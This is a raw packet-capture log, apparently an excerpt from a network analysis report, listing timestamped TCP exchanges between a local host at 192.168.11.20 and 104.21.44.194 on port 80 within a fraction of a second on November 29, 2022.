                                                                          Nov 29, 2022 09:20:41.313591003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313601017 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313611984 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313622952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313633919 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313643932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313654900 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313658953 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313658953 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313666105 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313677073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313688040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313699007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313709021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313719988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313731909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313776970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313787937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313798904 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313810110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313821077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313826084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313826084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313826084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313826084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313826084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313832045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313842058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313853025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313863993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313874960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313885927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313895941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313906908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313918114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313929081 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313939095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313950062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313961029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313971043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313999891 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313999891 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313999891 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313999891 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314011097 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314024925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314035892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314047098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314058065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314069033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314079046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314090014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314100981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314110994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314121962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314132929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314142942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314153910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314165115 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314167023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314167023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314167023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314167023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314176083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314187050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314284086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314295053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314306021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314316034 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314327002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314333916 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314337969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314347982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314358950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314368963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314379930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314390898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314400911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314412117 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314421892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314433098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314443111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314454079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314503908 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314503908 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314503908 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314532995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314543962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314553976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314564943 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314575911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314587116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314598083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314609051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314620018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314630032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314640999 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314651966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314661980 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314671993 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314671993 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314672947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314683914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314783096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314795017 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314805031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314815998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314826965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314836979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314847946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314858913 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314870119 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314876080 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314879894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314891100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314902067 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315012932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.315052032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315059900 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.315063953 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315074921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315084934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315095901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315105915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315116882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315126896 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315138102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315149069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315160036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315170050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315181017 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315191031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315201998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315212011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315222025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315229893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.315229893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.315232992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315243959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315256119 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315284014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315294981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315305948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315316916 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315327883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315339088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315349102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315360069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315371037 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315382004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315392971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315402985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.315553904 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315565109 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315576077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315587044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315598011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315598965 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.315608978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315618992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315629959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315640926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315643072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.315650940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315661907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315671921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315682888 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315694094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315705061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315715075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315727949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315789938 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315793991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.315802097 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315813065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.315960884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.315960884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.315960884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.315960884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.315960884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316066980 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316078901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316090107 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316099882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316111088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316122055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316129923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316133022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316157103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316169024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316179991 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316190004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316200972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316211939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316222906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316234112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316245079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316255093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316266060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316277027 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316287041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316298008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316308022 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316308022 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316308022 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316308975 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316308975 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316313982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316333055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316345930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316435099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316446066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316457033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316468000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316478968 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316489935 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316499949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316507101 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316507101 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316507101 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316507101 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316507101 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316507101 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316510916 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316521883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316533089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316543102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316554070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316565037 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316575050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316586018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316596985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316606998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316617966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316628933 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316664934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316677094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316677094 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316677094 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316688061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316699028 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316709042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316720009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316734076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316750050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316761971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316771984 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316781998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316792965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316803932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316813946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316814899 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316814899 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316814899 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316816092 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316816092 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316824913 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316834927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316845894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316857100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316931963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316942930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316953897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316965103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316975117 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316981077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.316986084 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.316997051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317007065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317017078 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317028046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317039013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317049026 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317059994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317070007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317080975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317091942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317101955 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317112923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317152023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317152023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317152023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317183971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317194939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317205906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317217112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317226887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317238092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317249060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317259073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317270041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317281008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317291975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317301989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317312956 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317322969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317333937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317357063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317436934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317447901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317459106 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317468882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317480087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317490101 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317500114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317511082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317521095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317523956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317523956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317523956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317523956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317523956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317532063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317543030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317553043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317692995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317693949 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317693949 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317693949 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317693949 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317693949 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317693949 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317693949 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317693949 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317703962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317713022 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317713022 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317713022 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317714930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317725897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317735910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317747116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317756891 CET8049852104.21.44.194192.168.11.20
